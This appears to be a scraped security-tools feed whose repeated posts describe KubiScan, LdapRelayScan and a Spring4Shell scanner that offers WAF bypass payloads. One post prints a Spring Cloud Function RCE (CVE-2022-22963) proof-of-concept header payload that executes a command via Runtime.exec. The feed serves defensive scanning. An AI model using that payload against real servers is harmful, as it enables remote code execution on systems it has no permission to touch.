KubiScan
KubiScan helps cluster administrators identify permissions that attackers could potentially exploit to compromise the clusters. This can be especially helpful on large environments where there are lots of permissions that can be challenging to track. KubiScan gathers information about risky roles\clusterroles, rolebindings\clusterrolebindings, users and pods, automating traditional manual processes and giving administrators the visibility they need to reduce risk.
https://github.com/cyberark/KubiScan
#kubernetes #rbac #scan #security #tools
KubiScan helps cluster administrators identify permissions that attackers could potentially exploit to compromise the clusters. This can be especially helpful on large environments where there are lots of permissions that can be challenging to track. KubiScan gathers information about risky roles\clusterroles, rolebindings\clusterrolebindings, users and pods, automating traditional manual processes and giving administrators the visibility they need to reduce risk.
https://github.com/cyberark/KubiScan
#kubernetes #rbac #scan #security #tools
GitHub
GitHub - cyberark/KubiScan: A tool to scan Kubernetes cluster for risky permissions
A tool to scan Kubernetes cluster for risky permissions - cyberark/KubiScan
LDAP Relay Scan
A tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authentication.
https://github.com/zyn3rgy/LdapRelayScan
#ad #ldap #scan #tools
A tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authentication.
https://github.com/zyn3rgy/LdapRelayScan
#ad #ldap #scan #tools
GitHub
GitHub - zyn3rgy/LdapRelayScan: Check for LDAP protections regarding the relay of NTLM authentication
Check for LDAP protections regarding the relay of NTLM authentication - zyn3rgy/LdapRelayScan
APT
SpringShell: Spring Core RCE (CVE-2022-22963) PoC Payload: spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc") Research: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html Exploit: https:/…
Spring4Shell Scan
A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
Features:
— Support for lists of URLs.
— Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).
— Fuzzing for HTTP GET and POST methods.
— Automatic validation of the vulnerability upon discovery.
— Randomized and non-intrusive payloads.
— WAF Bypass payloads.
https://github.com/fullhunt/spring4shell-scan
#spring4shell #spring #scan #tools
A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
Features:
— Support for lists of URLs.
— Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).
— Fuzzing for HTTP GET and POST methods.
— Automatic validation of the vulnerability upon discovery.
— Randomized and non-intrusive payloads.
— WAF Bypass payloads.
https://github.com/fullhunt/spring4shell-scan
#spring4shell #spring #scan #tools
GitHub
GitHub - fullhunt/spring4shell-scan: A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud…
A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities - fullhunt/spring4shell-scan